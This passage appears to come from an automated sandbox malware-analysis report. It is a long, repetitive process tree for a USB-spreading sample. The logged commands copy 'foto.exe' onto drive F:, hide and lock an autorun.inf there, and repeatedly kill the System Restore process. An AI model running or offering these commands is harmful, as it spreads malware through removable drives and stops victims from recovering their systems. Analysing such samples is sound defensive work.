    - Enumerates system info in registry
    PID:836
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2208
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1492
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2260
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1760
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2376
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:2220
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2580
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2096
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:1956
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:2112
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2732
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:532
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:888
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1008
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:596
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1800
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1048
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:672
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1992
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1980
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:2676
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1500
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:436
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2632
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2460
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1664
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1116
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1052
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:1656
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:844
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1828
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2668
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2124
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2320
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1072
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2036
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:2584
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2448
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1060
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:1716
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1936
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1536
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1648
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Drops autorun.inf file
    PID:2712
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:816
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2652
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2564
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Drops autorun.inf file
    PID:2980
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3012
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2920
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2932
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2280
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2884
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:2964
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:424
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2956
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1448
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    - Enumerates system info in registry
    PID:2172
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:2800
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2948
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2832
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2780
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3052
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2892
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:1420
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:2756
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1928
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2092
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2412
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    PID:2844
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1636
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1260
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2968
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2152
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1232
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:932
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:616
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1440
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:584
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:524
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:336
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2764
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2104
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:2880
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:916
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1724
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2368
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1264
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:624
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2436
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1676
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2400
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:2960
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1492
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2236
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:264
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:1640
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1760
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2404
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1976
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:924
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1128
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:324
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2380
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1008
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:596
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1800
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:272
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2052
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2504
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2632
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2460
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3040
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1580
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:2336
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:1004
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1828
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2352
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2056
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2124
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2344
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:792
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2036
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2584
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:824
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:1712
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1716
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:1644
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2700
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2724
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2564
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2980
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:3020
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:3028
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2932
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2280
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2976
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2824
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2964
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:424
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2868
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2896
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2172
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2800
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:580
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2816
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2780
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3052
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:2204
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2792
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1420
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2756
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:736
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:968
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2412
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2844
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:1424
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3036
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2760
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:1612
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2040
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:812
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:932
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2084
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:1436
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:584
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:524
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:2064
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2292
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2104
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2880
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2372
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1724
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2368
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1192
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:624
